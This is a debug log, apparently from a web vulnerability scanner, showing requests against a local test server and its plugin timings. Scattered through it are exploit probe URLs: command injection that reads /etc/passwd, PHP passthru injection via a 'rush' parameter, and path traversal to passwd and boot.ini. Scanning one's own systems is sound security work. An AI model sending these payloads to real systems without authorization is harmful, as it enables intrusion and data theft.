[Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/cgi-bin/pfdispaly.cgi?\'\n/bin/cat /etc/passwd|\'= returned HTTP code "404" (id=23725,from_cache=0,grep=1,rtt=0.15,did=A1Erpg48) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/banca/ returned HTTP code "404" (id=23726,from_cache=0,grep=1,rtt=0.29,did=vmJq5HMi) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/NetDynamic/ returned HTTP code "404" (id=23727,from_cache=0,grep=1,rtt=0.02,did=pKvFXf5q) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/intranet/ returned HTTP code "404" (id=23728,from_cache=0,grep=1,rtt=0.19,did=OGdm4wMV) [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/pdf/ returned HTTP code "404" (id=23729,from_cache=0,grep=1,rtt=0.13,did=RmDm9Ecy) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/foto/ returned HTTP code "404" (id=23730,from_cache=0,grep=1,rtt=0.02,did=BdcXi8Us) [Wed Feb 12 10:04:31 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 12275, 'reject-seen-url': 5671, 'reject-out-of-scope': 216, 'accept': 4938} [Wed Feb 12 10:04:31 2020 - debug] Updating socket timeout for localhost from 3.00 to 3.00 seconds [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/ccbill/secure/ccbill.log returned HTTP code "404" (id=23731,from_cache=0,grep=1,rtt=0.07,did=OwfglZdV) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/cuenta/ returned HTTP code "404" (id=23732,from_cache=0,grep=1,rtt=0.12,did=eA5dZB0M) [Wed Feb 12 10:04:31 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4532. [Wed Feb 12 10:04:31 2020 - debug] url_session.grep(uri="http://localhost:9090/tech/") took 0.25s to run [Wed Feb 12 10:04:31 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/tech/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/cgi-bin/dbmlparser.exe returned HTTP code "404" (id=23734,from_cache=0,grep=1,rtt=0.22,did=iex9CTAe) [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/postnuke/html/index.php?name=Forums&file=viewtopic&t=2&rush=ls -al&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 returned HTTP code "404" (id=23735,from_cache=0,grep=1,rtt=0.12,did=zmUFDGlj) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/WS_FTP.LOG returned HTTP code "404" (id=23736,from_cache=0,grep=1,rtt=0.04,did=zAG3WEHI) [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/na_admin/ returned HTTP code "404" (id=23737,from_cache=0,grep=1,rtt=0.18,did=pF3EjpbW) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/axis-cgi/buffer/command.cgi returned HTTP code "404" (id=23738,from_cache=0,grep=1,rtt=0.04,did=cmHHe0ea) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/hidden/ returned HTTP code "404" (id=23733,from_cache=0,grep=1,rtt=0.09,did=Ade7Ayn2) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/HyperStat/stat_what.log returned HTTP code "404" (id=23740,from_cache=0,grep=1,rtt=0.22,did=3l5g0Bjw) [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/?.jsp returned HTTP code "404" (id=23742,from_cache=0,grep=1,rtt=0.11,did=dV16VNlQ) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/pages/ returned HTTP code "404" (id=23747,from_cache=0,grep=1,rtt=0.17,did=D3vA3f0f) [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd returned HTTP code "404" (id=23741,from_cache=0,grep=1,rtt=0.18,did=GvPCSq0t) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/library/ returned HTTP code "404" (id=23745,from_cache=0,grep=1,rtt=0.22,did=qumAfBAG) [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/ows-bin/perlidlc.bat?dir= returned HTTP code "404" (id=23749,from_cache=0,grep=1,rtt=0.08,did=RbnbwABo) [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2231. [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/_vti_bin/fpcount.exe/ returned HTTP code "404" (id=23750,from_cache=0,grep=1,rtt=0.05,did=h78RZopV) [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/phpBB/index.php?name=Forums&file=viewtopic&t=2&rush=dir&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 returned HTTP code "404" (id=23743,from_cache=0,grep=1,rtt=0.15,did=LRji2yzm) [Wed Feb 12 10:04:31 2020 - debug] localhost:9090 connection pool stats (free:187 / in_use:6 / max:50 / total:193) [Wed Feb 12 10:04:31 2020 - debug] Connections with more in use time: (116e63666b8c9b66, 0.14 sec) (4cbe568b5f8d4e83, 0.07 sec) (9f67e1ec1fdf1b9d, 0.06 sec) (a37dee85624d75f9, 0.05 sec) (0a21da99d6ff27e7, 0.02 sec) [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/forum/index.php?name=forums&file=viewtopic&t=2&rush=ls -al&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 returned HTTP code "404" (id=23746,from_cache=0,grep=1,rtt=0.26,did=vvUd9WKI) [Wed Feb 12 10:04:31 2020 - debug] error_pages.grep(uri="http://localhost:9090/tech/") took 0.17s to run [Wed Feb 12 10:04:31 2020 - debug] strange_reason.grep(uri="http://localhost:9090/tech/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/tech/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/tech/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] cache_control.grep(uri="http://localhost:9090/tech/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] strange_headers.grep(uri="http://localhost:9090/tech/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] ssn.grep(uri="http://localhost:9090/tech/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] oracle.grep(uri="http://localhost:9090/tech/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] feeds.grep(uri="http://localhost:9090/tech/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/lost found/ returned HTTP code "404" (id=23751,from_cache=0,grep=1,rtt=0.10,did=6NwqkJG3) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/account/ returned HTTP code "404" (id=23744,from_cache=0,grep=1,rtt=0.06,did=ImNgaeDZ) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/cgi-bin/gbpass.pl returned HTTP code "404" (id=23739,from_cache=0,grep=1,rtt=0.11,did=ABx8BUrN) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/archivo/ returned HTTP code "404" (id=23748,from_cache=0,grep=1,rtt=0.14,did=hu9EJBYr) [Wed Feb 12 10:04:31 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/tech/") took 0.07s to run [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/oracle returned HTTP code "404" (id=23753,from_cache=0,grep=1,rtt=0.06,did=2mkzgkm3) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/download/ returned HTTP code "404" (id=23754,from_cache=0,grep=1,rtt=0.16,did=TjDPZ265) [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2232. [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/cgi-bin/phf returned HTTP code "404" (id=23752,from_cache=0,grep=1,rtt=0.07,did=ZYkdCp4P) [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/config/ returned HTTP code "404" (id=23755,from_cache=0,grep=1,rtt=0.11,did=jg7XmUBQ) [Wed Feb 12 10:04:31 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 12292, 'reject-seen-url': 5677, 'reject-out-of-scope': 216, 'accept': 4940} [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4532. [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4532. [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4533. [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2233. [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4534. [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/postnuke/viewtopic.php?t=2&rush=dir&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 returned HTTP code "404" (id=23756,from_cache=0,grep=1,rtt=0.09,did=F9OiIfFj) [Wed Feb 12 10:04:31 2020 - debug] symfony.grep(uri="http://localhost:9090/44/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] file_upload.grep(uri="http://localhost:9090/44/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/44/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2234. [Wed Feb 12 10:04:31 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/44/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/apache/ returned HTTP code "404" (id=23757,from_cache=0,grep=1,rtt=0.13,did=Ny3tssfS) [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/index.php?offset=[ Problem Here ] returned HTTP code "404" (id=23758,from_cache=0,grep=1,rtt=0.21,did=OH6vvmid) [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2235. [Wed Feb 12 10:04:31 2020 - debug] expect_ct.grep(uri="http://localhost:9090/44/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] svn_users.grep(uri="http://localhost:9090/44/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/44/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] private_ip.grep(uri="http://localhost:9090/44/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] motw.grep(uri="http://localhost:9090/44/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] meta_generator.grep(uri="http://localhost:9090/44/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] retirejs.grep(uri="http://localhost:9090/44/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/44/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:31 2020 - debug] serialized_object.grep(uri="http://localhost:9090/44/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] blank_body.grep(uri="http://localhost:9090/44/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/44/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/44/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] credit_cards.grep(uri="http://localhost:9090/44/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] websockets_links.grep(uri="http://localhost:9090/44/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] csp.grep(uri="http://localhost:9090/44/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] dom_xss.grep(uri="http://localhost:9090/44/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/44/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] keys.grep(uri="http://localhost:9090/44/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] clamav.grep(uri="http://localhost:9090/44/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2236. [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4534. [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2237. [Wed Feb 12 10:04:31 2020 - debug] url_session.grep(uri="http://localhost:9090/44/") took 0.02s to run [Wed Feb 12 10:04:31 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/44/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] objects.grep(uri="http://localhost:9090/44/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] error_500.grep(uri="http://localhost:9090/44/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] meta_tags.grep(uri="http://localhost:9090/44/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] password_profiling.grep(uri="http://localhost:9090/44/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] click_jacking.grep(uri="http://localhost:9090/44/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/44/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] lang.grep(uri="http://localhost:9090/44/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] vulners_db.grep(uri="http://localhost:9090/44/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/44/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/logfile/ returned HTTP code "404" (id=23763,from_cache=0,grep=1,rtt=0.11,did=Sez2VreI) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/banco/ returned HTTP code "404" (id=23764,from_cache=0,grep=1,rtt=0.19,did=cN4KXQYq) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/NetDynamics/ returned HTTP code "404" (id=23765,from_cache=0,grep=1,rtt=0.06,did=xAoaBJrg) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/fotos/ returned HTTP code "404" (id=23766,from_cache=0,grep=1,rtt=0.03,did=aCod5ZvW) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/cdrom/ returned HTTP code "404" (id=23767,from_cache=0,grep=1,rtt=0.03,did=G3ES2OaX) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/EXE/ returned HTTP code "404" (id=23768,from_cache=0,grep=1,rtt=0.11,did=hhrsiyku) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/sqlnet.log returned HTTP code "404" (id=23770,from_cache=0,grep=1,rtt=0.03,did=J8tQKZOT) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/misc/ returned HTTP code "404" (id=23771,from_cache=0,grep=1,rtt=0.13,did=g8VtC0Oj) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/invitado/ returned HTTP code "404" (id=23772,from_cache=0,grep=1,rtt=0.08,did=istmKL4k) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/cuentas/ returned HTTP code "404" (id=23760,from_cache=0,grep=1,rtt=0.14,did=eymxVpDp) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/demo/ returned HTTP code "404" (id=23762,from_cache=0,grep=1,rtt=0.08,did=Q7iFr0qp) [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2238. [Wed Feb 12 10:04:31 2020 - debug] error_pages.grep(uri="http://localhost:9090/44/") took 0.08s to run [Wed Feb 12 10:04:31 2020 - debug] strange_reason.grep(uri="http://localhost:9090/44/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/44/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/44/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] cache_control.grep(uri="http://localhost:9090/44/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] strange_headers.grep(uri="http://localhost:9090/44/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] ssn.grep(uri="http://localhost:9090/44/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] oracle.grep(uri="http://localhost:9090/44/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] feeds.grep(uri="http://localhost:9090/44/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/PDG_Cart/ returned HTTP code "404" (id=23759,from_cache=0,grep=1,rtt=0.07,did=fblec9wZ) [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/?.jsp returned HTTP code "404" (id=23774,from_cache=0,grep=1,rtt=0.10,did=bxIB4Cd1) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/polls returned HTTP code "404" (id=23775,from_cache=0,grep=1,rtt=0.09,did=yDmjztKL) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/hitmatic/ returned HTTP code "404" (id=23776,from_cache=0,grep=1,rtt=0.07,did=FED6Kxwt) [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/cgi-bin/FormMail-clone.cgi returned HTTP code "404" (id=23777,from_cache=0,grep=1,rtt=0.14,did=wdm14NLV) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/client/ returned HTTP code "404" (id=23779,from_cache=0,grep=1,rtt=0.03,did=UBiVlySD) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/buynow/ returned HTTP code "404" (id=23781,from_cache=0,grep=1,rtt=0.02,did=aOGaKp2d) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/Pages/ returned HTTP code "404" (id=23773,from_cache=0,grep=1,rtt=0.13,did=UmFtvTjB) [Wed Feb 12 10:04:31 2020 - debug] localhost:9090 connection pool stats (free:192 / in_use:4 / max:50 / total:196) [Wed Feb 12 10:04:31 2020 - debug] Connections with more in use time: (92d255194d83c75b, 0.03 sec) (e9c333a2b00613de, 0.03 sec) (95aeb0a64248aac6, 0.02 sec) (120d36f23e75df36, 0.01 sec) [Wed Feb 12 10:04:31 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/44/") took 0.09s to run [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=23769,from_cache=0,grep=1,rtt=0.07,did=eYtK5Xkt) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/libro/ returned HTTP code "404" (id=23780,from_cache=0,grep=1,rtt=0.12,did=qtR3boXH) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/includes/ returned HTTP code "404" (id=23782,from_cache=0,grep=1,rtt=0.10,did=FLG8IzLn) [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/administration/ returned HTTP code "404" (id=23778,from_cache=0,grep=1,rtt=0.06,did=lj25nbqh) [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/config.dat returned HTTP code "404" (id=23700,from_cache=0,grep=1,rtt=0.12,did=0vH4sjtO) [Wed Feb 12 10:04:31 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 12305, 'reject-seen-url': 5688, 'reject-out-of-scope': 216, 'accept': 4941} [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2239. [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/OpenFile.aspx?file=../../../../../../../../../../boot.ini returned HTTP code "404" (id=23761,from_cache=0,grep=1,rtt=0.09,did=oTm5lD9b) [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2240. [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2241. [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/oradata/ returned HTTP code "404" (id=23784,from_cache=0,grep=1,rtt=0.11,did=s9HdefBS) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/config/checks.txt returned HTTP code "404" (id=23785,from_cache=0,grep=1,rtt=0.06,did=6WVNTIXx) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/buddies.blt returned HTTP code "404" (id=23786,from_cache=0,grep=1,rtt=0.16,did=hdfsFTNg) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/sample/ returned HTTP code "404" (id=23787,from_cache=0,grep=1,rtt=0.16,did=nx1CCyD8) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/asp/ returned HTTP code "404" (id=23788,from_cache=0,grep=1,rtt=0.19,did=MFTIiPfS) [Wed Feb 12 10:04:31 2020 - debug] symfony.grep(uri="http://localhost:9090/uk/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] expect_ct.grep(uri="http://localhost:9090/uk/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] svn_users.grep(uri="http://localhost:9090/uk/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/uk/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] private_ip.grep(uri="http://localhost:9090/uk/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] motw.grep(uri="http://localhost:9090/uk/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] meta_generator.grep(uri="http://localhost:9090/uk/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] retirejs.grep(uri="http://localhost:9090/uk/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/uk/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] file_upload.grep(uri="http://localhost:9090/uk/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:31 2020 - debug] serialized_object.grep(uri="http://localhost:9090/uk/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] blank_body.grep(uri="http://localhost:9090/uk/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/uk/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/uk/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] credit_cards.grep(uri="http://localhost:9090/uk/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] websockets_links.grep(uri="http://localhost:9090/uk/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] csp.grep(uri="http://localhost:9090/uk/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] dom_xss.grep(uri="http://localhost:9090/uk/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] vulners_db.grep(uri="http://localhost:9090/uk/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/uk/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] keys.grep(uri="http://localhost:9090/uk/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/uk/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] clamav.grep(uri="http://localhost:9090/uk/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2242. [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4534. [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/cgi-bin/ccbill-local.pl?cmd=MENU returned HTTP code "404" (id=23783,from_cache=0,grep=1,rtt=0.07,did=6emqsNgH) [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2243. [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/mail/ returned HTTP code "404" (id=23789,from_cache=0,grep=1,rtt=0.05,did=96TErgMl) [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=23790,from_cache=0,grep=1,rtt=0.07,did=LmPIgbbO) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/cgi-bin/upload.cgi returned HTTP code "404" (id=23791,from_cache=0,grep=1,rtt=0.06,did=LQ4ffwgB) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/app/ returned HTTP code "302" (id=23792,from_cache=0,grep=1,rtt=0.05,did=0Z3NkZfh) [Wed Feb 12 10:04:31 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/uk/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2244. [Wed Feb 12 10:04:31 2020 - debug] url_session.grep(uri="http://localhost:9090/uk/") took 0.01s to run [Wed Feb 12 10:04:31 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/uk/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] objects.grep(uri="http://localhost:9090/uk/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] error_500.grep(uri="http://localhost:9090/uk/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] meta_tags.grep(uri="http://localhost:9090/uk/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] password_profiling.grep(uri="http://localhost:9090/uk/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] click_jacking.grep(uri="http://localhost:9090/uk/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/uk/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] lang.grep(uri="http://localhost:9090/uk/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/uk/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/shopping/shopdisplayproducts.asp?id=1&cat= returned HTTP code "404" (id=23793,from_cache=0,grep=1,rtt=0.06,did=urkbvBal) [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=sec&password=secu returned HTTP code "404" (id=23794,from_cache=0,grep=1,rtt=0.09,did=sGlJCxAE) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/public/ returned HTTP code "404" (id=23795,from_cache=0,grep=1,rtt=0.05,did=uoHDw6UF) [Wed Feb 12 10:04:31 2020 - debug] localhost:9090 connection pool stats (free:197 / in_use:2 / max:50 / total:199) [Wed Feb 12 10:04:31 2020 - debug] Connections with more in use time: (0234fcc660fc843a, 0.04 sec) (e9c333a2b00613de, 0.02 sec) [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4534. [Wed Feb 12 10:04:31 2020 - debug] error_pages.grep(uri="http://localhost:9090/uk/") took 0.08s to run [Wed Feb 12 10:04:31 2020 - debug] 